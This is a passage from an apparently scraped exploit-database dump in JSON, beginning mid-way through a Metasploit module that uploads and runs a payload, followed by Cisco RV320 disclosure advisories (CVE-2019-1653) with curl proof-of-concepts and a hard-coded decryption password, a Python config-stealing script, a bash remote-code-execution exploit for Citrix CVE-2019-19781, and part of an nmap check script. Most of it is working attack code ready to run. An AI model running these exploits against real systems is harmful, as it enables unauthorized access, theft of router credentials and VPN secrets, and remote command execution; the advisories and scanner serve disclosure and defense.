inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5)\n end\n\n\n # Exploits the target in Windows platform.\n #\n # @return [void]\n def exploit_as_windows\n tmp_path = get_tmp_path\n\n if tmp_path.blank?\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\n end\n\n @b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))\n @fname = normalize_payload_fname(tmp_path,\"#{Rex::Text.rand_text_alpha(5)}.exe\")\n new_fname = normalize_payload_fname(tmp_path,\"#{Rex::Text.rand_text_alpha(5)}.exe\")\n @fname.gsub!(/Program Files/, 'PROGRA~1')\n new_fname.gsub!(/Program Files/, 'PROGRA~1')\n register_files_for_cleanup(@fname, new_fname)\n\n print_status(\"Attempting to upload #{@fname}\")\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\n\n print_status(\"Attempting to copy payload to #{new_fname}\")\n get_dup_file_code(@fname, new_fname)\n\n print_status(\"Attempting to execute #{new_fname}\")\n @command = new_fname\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5)\n end\n\n\n # Exploits the target in Linux platform.\n #\n # @return [void]\n def exploit_as_linux\n tmp_path = get_tmp_path\n\n if tmp_path.blank?\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\n end\n\n @b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))\n @fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5))\n new_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6))\n register_files_for_cleanup(@fname, new_fname)\n\n print_status(\"Attempting to upload #{@fname}\")\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\n\n @command = \"chmod +x #{@fname}\"\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\")\n\n print_status(\"Attempting to copy payload to #{new_fname}\")\n get_dup_file_code(@fname, new_fname)\n\n print_status(\"Attempting to execute #{new_fname}\")\n @command = new_fname\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5)\n end\n\n def exploit\n @wrap_marker = Rex::Text.rand_text_alpha(5..10)\n\n # Start the FTP service\n print_status(\"Starting the FTP server.\")\n start_service\n\n target_platform = get_target_platform\n if target_platform.nil?\n fail_with(Failure::Unreachable, 'Target did not respond to OS check. Confirm RHOSTS and RPORT, then run \"check\".')\n else\n print_status(\"Target being detected as: #{target_platform}\")\n end\n\n unless target_platform_compat?(target_platform)\n fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.')\n end\n\n case target.name.downcase\n when /java$/\n exploit_as_java\n when /windows$/\n exploit_as_windows\n when /linux$/\n exploit_as_linux\n end\n end\n\n # Wraps request.\n #\n # @return [String]\n def wrap(string)\n \"#{@wrap_marker}\\n#{string}#{@wrap_marker}\\n\"\n end\n\n # Returns unwrapped response.\n #\n # @return [String]\n def clear_response(string)\n if match = string.match(/#{@wrap_marker}\\n(.*)\\n#{@wrap_marker}\\n/m)\n return match.captures[0]\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/32569", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-02-06T05:12:46", "description": "RedTeam Pentesting discovered that the configuration of a Cisco RV320 router may be exported without authentication through the device's web interface. Affected versions include 1.4.2.15 and 1.4.2.17.", "cvss3": {}, "published": "2019-01-24T00:00:00", "type": "zdt", "title": "Cisco RV320 Unauthenticated Configuration Export Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-1653"], "modified": "2019-01-24T00:00:00", "id": "1337DAY-ID-32053", "href": "https://0day.today/exploit/description/32053", "sourceData": "Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others\r\nAffected Versions: 1.4.2.15, 1.4.2.17\r\nFixed Versions: since 1.4.2.19\r\nVulnerability Type: Information Disclosure\r\nSecurity Risk: high\r\nVendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info\r\nVendor Status: fixed version released\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-002\r\nAdvisory Status: published\r\nCVE: CVE-2019-1653\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653\r\n\r\n\r\nIntroduction\r\n============\r\n\r\n\"Keep your employees, your business, and yourself productive and\r\neffective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal\r\nchoice for any small office or small business looking for performance,\r\nsecurity, and reliability in its network.\"\r\n(from the Cisco RV320 product page [1])\r\n\r\n\r\nMore Details\r\n============\r\n\r\nThe Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based\r\nconfiguration interface. In the device's firmware, this functionality is\r\nimplemented using a variety of CGI programs. Access to this web\r\ninterface requires prior authentication using a username and password.\r\nRedTeam Pentesting discovered the CGI program:\r\n\r\n/cgi-bin/config.exp\r\n\r\nThis program can be used to export the router's configuration. In\r\ncontrast to other functions, this CGI program does not require any form\r\nof authentication. It may be accessed through the router's web server,\r\nwhich is available from the LAN by default. As described in [2],\r\nfirmware versions from 1.4.2 to 1.4.2.15 (including) also expose the web\r\nserver to the WAN on TCP port 8007.\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\nA device's configuration can be retrieved by issuing an HTTP GET request\r\nto the vulnerable CGI program (output shortened):\r\n\r\n------------------------------------------------------------------------\r\n$ curl -s http://192.168.1.1/cgi-bin/config.exp\r\n####sysconfig####\r\n[VERSION]\r\nVERSION=73\r\nMODEL=RV320\r\nSSL=0\r\nIPSEC=0\r\nPPTP=0\r\nPLATFORMCODE=RV0XX\r\n[...]\r\n[SYSTEM]\r\nHOSTNAME=router\r\nDOMAINNAME=example.com\r\nDOMAINCHANGE=1\r\nUSERNAME=cisco\r\nPASSWD=066bae9070a9a95b3e03019db131cd40\r\n[...]\r\n------------------------------------------------------------------------\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nPrevent untrusted clients from connecting to the device's web server.\r\n\r\n\r\nFix\r\n===\r\n\r\nInstall firmware version 1.4.2.19 (or later) on the router.\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nThis vulnerability is rated as a high risk as it exposes the device's\r\nconfiguration to untrusted, potentially malicious parties. By\r\ndownloading the configuration, attackers can obtain internal network\r\nconfiguration, VPN or IPsec secrets, as well as password hashes for the\r\nrouter's user accounts. Knowledge of a user's password hash is\r\nsufficient to log into the router's web interface. Any information\r\nobtained through exploitation of this vulnerability can be used to\r\nfacilitate further compromise of the device itself or attached networks.\r\n\r\n\r\nTimeline\r\n========\r\n\r\n2018-09-19 Vulnerability identified\r\n2018-09-27 Customer approved disclosure to vendor\r\n2018-09-28 Vendor notified\r\n2018-10-05 Receipt of advisory acknowledged by vendor\r\n2018-10-05 Notified vendor of disclosure date: 2019-01-09\r\n2018-11-18 List of affected versions provided by vendor\r\n2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor\r\n2019-01-23 Advisory published\r\n\r\n\r\nReferences\r\n==========\r\n\r\n[1] https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html\r\n[2] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg42801\n\n# 0day.today [2019-02-06] #", "sourceHref": "https://0day.today/exploit/32053", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-02-06T05:12:18", "description": "RedTeam Pentesting discovered that the Cisco RV320 router exposes sensitive diagnostic data without authentication through the device's web interface. Versions affected include 1.4.2.15 and 1.4.2.17.", "cvss3": {}, "published": "2019-01-24T00:00:00", "type": "zdt", "title": "Cisco RV320 Unauthenticated Diagnostic Data Retrieval Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-1653"], "modified": "2019-01-24T00:00:00", "id": "1337DAY-ID-32052", "href": "https://0day.today/exploit/description/32052", "sourceData": "Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others\r\nAffected Versions: 1.4.2.15, 1.4.2.17\r\nFixed Versions: since 1.4.2.19\r\nVulnerability Type: Information Disclosure\r\nSecurity Risk: high\r\nVendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info\r\nVendor Status: fixed version released\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-003\r\nAdvisory Status: published\r\nCVE: CVE-2019-1653\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653\r\n\r\n\r\nIntroduction\r\n============\r\n\r\n\"Keep your employees, your business, and yourself productive and\r\neffective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal\r\nchoice for any small office or small business looking for performance,\r\nsecurity, and reliability in its network.\"\r\n(from the Cisco RV320 product page [1])\r\n\r\n\r\nMore Details\r\n============\r\n\r\nThe Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based\r\nconfiguration interface. In the device's firmware, this functionality is\r\nimplemented using a variety of CGI programs. Access to this web\r\ninterface requires prior authentication using a username and password.\r\nRedTeam Pentesting discovered the CGI program:\r\n\r\n/cgi-bin/export_debug_msg.exp\r\n\r\nThis program can be used to retrieve various diagnostic information from\r\nthe device, which includes its current configuration. In contrast to\r\nother functions, this CGI program does not require any form of\r\nauthentication. It may be accessed through the router's web server,\r\nwhich is available from the LAN by default. As described in [2],\r\nfirmware versions from 1.4.2 to 1.4.2.15 (including) also expose the web\r\nserver to the WAN on TCP port 8007.\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\nThe diagnostic data can be retrieved by issuing an HTTP POST request to\r\nthe vulnerable CGI program. OpenSSL is used to decrypt the data with the\r\nhard-coded password \"NKDebug12#$%\" before unpacking it with tar (output\r\nshortened):\r\n\r\n------------------------------------------------------------------------\r\n$ curl --data submitdebugmsg=1 \\\r\n 'http://192.168.1.1/cgi-bin/export_debug_msg.exp' > debug\r\n\r\n$ openssl aes-128-cbc -salt -md md5 -d \\\r\n -k 'NKDebug12#$%' < debug > debug.tgz\r\n\r\n$ mkdir output && tar -xf debug.tgz -C output/\r\n\r\n$ ls -1 output/\r\ndebug_messages.txt\r\netc.tgz\r\nnk_sysconfig\r\nvar.tgz\r\n\r\n$ cat output/nk_sysconfig\r\n####sysconfig####\r\n[VERSION]\r\nVERSION=73\r\nMODEL=RV320\r\nSSL=0\r\nIPSEC=0\r\nPPTP=0\r\nPLATFORMCODE=RV0XX\r\n[...]\r\n[SYSTEM]\r\nHOSTNAME=router\r\nDOMAINNAME=example.com\r\nDOMAINCHANGE=1\r\nUSERNAME=cisco\r\nPASSWD=066bae9070a9a95b3e03019db131cd40\r\n[...]\r\n------------------------------------------------------------------------\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nPrevent untrusted clients from connecting to the device's web server.\r\n\r\n\r\nFix\r\n===\r\n\r\nInstall firmware version 1.4.2.19 (or later) on the router.\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nThis vulnerability is rated as a high risk as it exposes sensitive\r\ndiagnostic information, such as the device's configuration, to\r\nuntrusted, potentially malicious parties. By retrieving this\r\ninformation, attackers can obtain internal network configuration, VPN or\r\nIPsec secrets, as well as password hashes for the router's user\r\naccounts. Knowledge of a user's password hash is sufficient to log into\r\nthe router's web interface. Any information obtained through\r\nexploitation of this vulnerability can be used to facilitate further\r\ncompromise of the device itself or attached networks.\r\n\r\n\r\nTimeline\r\n========\r\n\r\n2018-09-19 Vulnerability identified\r\n2018-09-27 Customer approved disclosure to vendor\r\n2018-09-28 Vendor notified\r\n2018-10-05 Receipt of advisory acknowledged by vendor\r\n2018-10-05 Notified vendor of disclosure date: 2019-01-09\r\n2018-11-18 List of affected versions provided by vendor\r\n2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor\r\n2019-01-23 Advisory published\r\n\r\n\r\nReferences\r\n==========\r\n\r\n[1] https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html\r\n[2] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg42801\n\n# 0day.today [2019-02-06] #", "sourceHref": "https://0day.today/exploit/32052", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-02-25T04:16:34", "description": "Exploit for hardware platform in category web applications", "cvss3": {}, "published": "2019-01-28T00:00:00", "type": "zdt", "title": "Cisco RV300 / RV320 - Information Disclosure Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-1653"], "modified": "2019-01-28T00:00:00", "id": "1337DAY-ID-32070", "href": "https://0day.today/exploit/description/32070", "sourceData": "# Exploit Title: Cisco RV300 / RV320 - Information Disclosure Vulnerability\r\n# Exploit Author: Harom Ramos [Horus]\r\n# Tested on: Cisco RV300/RV320\r\n# CVE : CVE-2019-1653\r\n\r\nimport requests\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nfrom fake_useragent import UserAgent\r\n\r\ndef random_headers():\r\n return dict({'user-agent': UserAgent().random})\r\n\r\ndef request(url):\r\n r = requests.Session()\r\n try:\r\n get = r.get(url, headers = random_headers(), timeout = 5, verify=False)#, allow_redirects=False\r\n if get.status_code == 200: \r\n return get.text \r\n except requests.ConnectionError:\r\n return 'Error Conecting'\r\n except requests.Timeout:\r\n\t return 'Error Timeout'\r\n except KeyboardInterrupt:\r\n raise \r\n except:\r\n return 0\r\n\r\nprint(\"\") \r\nprint(\"##################################################\")\r\nprint(\"CISCO CVE-2019-1653 POC\")\r\nprint(\"From H. with love\")\r\nprint(\"\")\r\n\r\nurl = raw_input(\"URL> EX:http://url:port/ \") \r\nurl = url + \"/cgi-bin/config.exp\"\r\nprint(request(url))\n\n# 0day.today [2019-02-25] #", "sourceHref": "https://0day.today/exploit/32070", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-03-30T17:27:53", "description": "Cisco RV320 router still exposes sensitive diagnostic data without authentication via the device's web interface due to an inadequate fix by the vendor.", "cvss3": {}, "published": "2019-03-27T00:00:00", "type": "zdt", "title": "Cisco RV320 Unauthenticated Diagnostic Data Retrieval Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-1653"], "modified": "2019-03-27T00:00:00", "id": "1337DAY-ID-32438", "href": "https://0day.today/exploit/description/32438", "sourceData": "Cisco RV320 Unauthenticated Diagnostic Data Retrieval Vulnerability\r\n\r\nDetails\r\n=======\r\n\r\nProduct: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others\r\nAffected Versions: 1.4.2.15 through 1.4.2.20\r\nFixed Versions: none\r\nVulnerability Type: Information Disclosure\r\nSecurity Risk: high\r\nVendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info\r\nVendor Status: working on patch\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-004\r\nAdvisory Status: published\r\nCVE: CVE-2019-1653\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653\r\n\r\n\r\nIntroduction\r\n============\r\n\r\n\"Keep your employees, your business, and yourself productive and\r\neffective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal\r\nchoice for any small office or small business looking for performance,\r\nsecurity, and reliability in its network.\"\r\n(from the Cisco RV320 product page [1])\r\n\r\n\r\nMore Details\r\n============\r\n\r\nThe Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based\r\nconfiguration interface, which is implemented in various CGI programs in\r\nthe device's firmware. Access to this web interface requires prior\r\nauthentication using a username and password. Previously, RedTeam\r\nPentesting identified a vulnerability (rt-sa-2018-003) [2] in the CGI\r\nprogram:\r\n\r\n/cgi-bin/export_debug_msg.exp\r\n\r\nBy issuing an HTTP POST request to this program, it was possible to\r\nretrieve various diagnostic information from the device, including its\r\ncurrent configuration. This request did not require any prior\r\nauthentication. Cisco adressed this vulnerability in firmware version\r\n1.4.2.19 [3].\r\n\r\nRedTeam Pentesting discovered that the CGI program in the patched\r\nfirmware is still vulnerable. The user agent \"curl\" is blacklisted by\r\nthe firmware and must be adjusted in the HTTP client. Again,\r\nexploitation does not require any authentication.\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\nThe diagnostic data can be retrieved by issuing an HTTP POST request to\r\nthe vulnerable CGI program. OpenSSL is used to decrypt the data with the\r\nhard-coded password \"NKDebug12#$%\" before unpacking it with tar (output\r\nshortened):\r\n\r\n------------------------------------------------------------------------\r\n$ curl -k -A kurl -X POST --data 'submitdebugmsg=1' \\\r\n 'https://192.168.1.1/cgi-bin/export_debug_msg.exp' > debug\r\n\r\n$ openssl aes-128-cbc -salt -md md5 -d \\\r\n -k 'NKDebug12#$%' < debug > debug.tgz\r\n\r\n$ mkdir output && tar -xf debug.tgz -C output/\r\n\r\n$ ls -1 output/\r\ndebug_messages.txt\r\netc.tgz\r\nnk_sysconfig\r\nvar.tgz\r\n\r\n$ cat output/nk_sysconfig\r\n####sysconfig####\r\n[VERSION]\r\nVERSION=73\r\nMODEL=RV320\r\nSSL=0\r\nIPSEC=0\r\nPPTP=0\r\nPLATFORMCODE=RV0XX\r\n[...]\r\n[SYSTEM]\r\nHOSTNAME=router\r\nDOMAINNAME=example.com\r\nDOMAINCHANGE=1\r\nUSERNAME=cisco\r\nPASSWD=066bae9070a9a95b3e03019db131cd40\r\n[...]\r\n------------------------------------------------------------------------\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nPrevent untrusted clients from connecting to the device's web server.\r\n\r\n\r\nFix\r\n===\r\n\r\nNone\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nThis vulnerability is rated as a high risk as it exposes sensitive\r\ndiagnostic information, such as the device's configuration, to\r\nuntrusted, potentially malicious parties. By retrieving this\r\ninformation, attackers can obtain internal network configuration, VPN or\r\nIPsec secrets, as well as password hashes for the router's user\r\naccounts. Knowledge of a user's password hash is sufficient to log into\r\nthe router's web interface, cracking of the hash is not required. Any\r\ninformation obtained through exploitation of this vulnerability can be\r\nused to facilitate further compromise of the device itself or attached\r\nnetworks.\n\n# 0day.today [2019-03-30] #", "sourceHref": "https://0day.today/exploit/32438", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-03-30T17:25:02", "description": "The configuration of a Cisco RV320 router can still be exported without authentication via the device's web interface due to an inadequate fix by the vendor.", "cvss3": {}, "published": "2019-03-27T00:00:00", "type": "zdt", "title": "Cisco RV320 Unauthenticated Configuration Export Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-1653"], "modified": "2019-03-27T00:00:00", "id": "1337DAY-ID-32439", "href": "https://0day.today/exploit/description/32439", "sourceData": "Cisco RV320 Unauthenticated Configuration Export Vulnerability\r\n\r\nDetails\r\n=======\r\n\r\nProduct: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others\r\nAffected Versions: 1.4.2.15 through 1.4.2.20\r\nFixed Versions: none\r\nVulnerability Type: Information Disclosure\r\nSecurity Risk: high\r\nVendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info\r\nVendor Status: working on patch\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-003\r\nAdvisory Status: published\r\nCVE: CVE-2019-1653\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653\r\n\r\n\r\nIntroduction\r\n============\r\n\r\n\"Keep your employees, your business, and yourself productive and\r\neffective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal\r\nchoice for any small office or small business looking for performance,\r\nsecurity, and reliability in its network.\"\r\n(from the Cisco RV320 product page [1])\r\n\r\n\r\nMore Details\r\n============\r\n\r\nThe Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based\r\nconfiguration interface, which is implemented in various CGI programs in\r\nthe device's firmware. Access to this web interface requires prior\r\nauthentication using a username and password. Previously, RedTeam\r\nPentesting identified a vulnerability (rt-sa-2018-002) [2] in the CGI\r\nprogram:\r\n\r\n/cgi-bin/config.exp\r\n\r\nBy issuing an HTTP GET request to this program, it was possible to\r\nexport a router's configuration without providing any prior\r\nauthentication. This vulnerability was adressed in firmware version\r\n1.4.2.19 published by Cisco [3].\r\n\r\nRedTeam Pentesting discovered that the CGI program in the patched\r\nfirmware is still vulnerable. By performing a specially crafted HTTP\r\nPOST request, attackers are still able to download the router's\r\nconfiguration. The user agent \"curl\" is blacklisted by the firmware and\r\nmust be adjusted in the HTTP client. Again, exploitation does not\r\nrequire any authentication.\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\nA device's configuration can be retrieved by issuing an HTTP POST request\r\nto the vulnerable CGI program (output shortened):\r\n\r\n------------------------------------------------------------------------\r\n$ curl -s -k -A kurl -X POST --data 'submitbkconfig=0' \\\r\n 'https://192.168.1.1/cgi-bin/config.exp'\r\n####sysconfig####\r\n[VERSION]\r\nVERSION=73\r\nMODEL=RV320\r\nSSL=0\r\nIPSEC=0\r\nPPTP=0\r\nPLATFORMCODE=RV0XX\r\n[...]\r\n[SYSTEM]\r\nHOSTNAME=router\r\nDOMAINNAME=example.com\r\nDOMAINCHANGE=1\r\nUSERNAME=cisco\r\nPASSWD=066bae9070a9a95b3e03019db131cd40\r\n[...]\r\n------------------------------------------------------------------------\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nPrevent untrusted clients from connecting to the device's web server.\r\n\r\n\r\nFix\r\n===\r\n\r\nNone\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nThis vulnerability is rated as a high risk as it exposes the device's\r\nconfiguration to untrusted, potentially malicious parties. By\r\ndownloading the configuration, attackers can obtain internal network\r\nconfiguration, VPN or IPsec secrets, as well as password hashes for the\r\nrouter's user accounts. Knowledge of a user's password hash is\r\nsufficient to log into the router's web interface, cracking of the hash\r\nis not required. Any information obtained through exploitation of this\r\nvulnerability can be used to facilitate further compromise of the device\r\nitself or attached networks.\n\n# 0day.today [2019-03-30] #", "sourceHref": "https://0day.today/exploit/32439", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2020-01-19T23:06:56", "description": "Exploit for multiple platform in category web applications", "cvss3": {}, "published": "2020-01-11T00:00:00", "type": "zdt", "title": "Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution Vulnerability (1)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-11T00:00:00", "id": "1337DAY-ID-33794", "href": "https://0day.today/exploit/description/33794", "sourceData": "#!/bin/bash\r\n# Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781\r\n# Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a'\r\n# Release Date : 11/01/2020\r\n# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia\r\necho \"=================================================================================\r\n ___ _ _ ____ ___ _ _\r\n| _ \\ _ _ ___ (_) ___ __ | |_ |_ / ___ _ _ ___ |_ _| _ _ __| |(_) __ _\r\n| _/| '_|/ _ \\ | |/ -_)/ _|| _| / / / -_)| '_|/ _ \\ | | | ' \\ / _' || |/ _' |\r\n|_| |_| \\___/_/ |\\___|\\__| \\__| /___|\\___||_| \\___/ |___||_||_|\\__,_||_|\\__,_|\r\n |__/ CVE-2019-19781\r\n=================================================================================\"\r\n##############################\r\nif [ -z \"$1\" ];\r\nthen\r\necho -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\\n'\r\nexit;\r\nfi\r\nfilenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1);\r\ncurl -s -k \"https://$1/vpn/../vpns/portal/scripts/newbm.pl\" -d \"url=http://example.com\\&title=[%25+template.new({'BLOCK'%3d'exec(\\'$2 | tee /netscaler/portal/templates/$filenameid.xml\\')%3b'})+%25]\\&desc=test\\&UI_inuse=RfWeb\" -H \"NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid\" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is\r\necho -ne \"\\n\" ;curl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -s -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is\r\necho -ne \"Command Output :\\n\"\r\ncurl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is\n\n# 0day.today [2020-01-19] #", "sourceHref": "https://0day.today/exploit/33794", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-19T23:02:20", "description": "Exploit for multiple platform in category web applications", "cvss3": {}, "published": "2020-01-16T00:00:00", "type": "zdt", "title": "Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-16T00:00:00", "id": "1337DAY-ID-33824", "href": "https://0day.today/exploit/description/33824", "sourceData": "# Exploit Title: Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal\r\n# CVE: CVE-2019-19781\r\n# Vulenrability: Path Traversal\r\n# Vulnerablity Discovery: Mikhail Klyuchnikov\r\n# Exploit Author: Dhiraj Mishra\r\n# Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0\r\n# Vendor Homepage: https://www.citrix.com/\r\n# References: https://support.citrix.com/article/CTX267027\r\n# https://github.com/nmap/nmap/pull/1893\r\n\r\nlocal http = require \"http\"\r\nlocal stdnse = require \"stdnse\"\r\nlocal shortport = require \"shortport\"\r\nlocal table = require \"table\"\r\nlocal string = require \"string\"\r\nlocal vulns = require \"vulns\"\r\nlocal nmap = require \"nmap\"\r\nlocal io = require \"io\"\r\n\r\ndescription = [[\r\nThis NSE script checks whether the traget server is vulnerable to\r\nCVE-2019-19781\r\n]]\r\n---\r\n-- @usage\r\n-- nmap --script https-citrix-path-traversal -p <port> <host>\r\n-- nmap --script https-citrix-path-traversal -p <port> <host> --script-args\r\noutput='file.txt'\r\n-- @output\r\n-- PORT STATE SERVICE\r\n-- 443/tcp open http\r\n-- | CVE-2019-19781:\r\n-- | Host is vulnerable to CVE-2019-19781\r\n-- @changelog\r\n-- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj)\r\n-- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__)\r\n-- @xmloutput\r\n-- <table key=\"NMAP-1\">\r\n-- <elem key=\"title\">Citrix ADC Path Traversal aka (Shitrix)</elem>\r\n-- <elem key=\"state\">VULNERABLE</elem>\r\n-- <table key=\"description\">\r\n-- <elem>Citrix Application Delivery Controller (ADC) and Gateway 10.5,\r\n11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path\r\n-- traversal vulnerability that allows attackers to read configurations or\r\nany other file.\r\n-- </table>\r\n-- <table key=\"dates\">\r\n-- <table key=\"disclosure\">\r\n-- <elem key=\"year\">2019</elem>\r\n-- <elem key=\"day\">17</elem>\r\n-- <elem key=\"month\">12</elem>\r\n-- </table>\r\n-- </table>\r\n-- <elem key=\"disclosure\">17-12-2019</elem>\r\n-- <table key=\"extra_info\">\r\n-- </table>\r\n-- <table key=\"refs\">\r\n-- <elem>https://support.citrix.com/article/CTX267027</elem>\r\n-- <elem>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</elem>\r\n-- </table>\r\n-- </table>\r\n\r\nauthor = \"Dhiraj Mishra (@RandomDhiraj)\"\r\nDiscovery = \"Mikhail Klyuchnikov (@__Mn1__)\"\r\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\r\ncategories = {\"discovery\", \"intrusive\",\"vuln\"}\r\n\r\nportrule = shortport.ssl\r\n\r\naction = function(host,port)\r\n local outputFile = stdnse.get_script_args(SCRIPT_NAME..\".output\") or nil\r\n local vuln = {\r\n title = 'Citrix ADC Path Traversal',\r\n state = vulns.STATE.NOT_VULN,\r\n description = [[\r\nCitrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0,\r\n12.1, and 13.0 are vulnerable\r\nto a unauthenticated path traversal vulnerability that allows attackers to\r\nread configurations or any other file.\r\n ]],\r\n references = {\r\n 'https://support.citrix.com/article/CTX267027',\r\n 'https://nvd.nist.gov/vuln/detail/CVE-2019-19781',\r\n },\r\n dates = {\r\n disclosure = {year = '2019', month = '12', day = '17'},\r\n },\r\n }\r\n local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)\r\n local path = \"/vpn/../vpns/cfg/smb.conf\"\r\n local response\r\n local output = {}\r\n local success = \"Host is vulnerable to CVE-2019-19781\"\r\n local fail = \"Host is not vulnerable\"\r\n local match = \"[global]\"\r\n local credentials\r\n local citrixADC\r\n response = http.get(host, 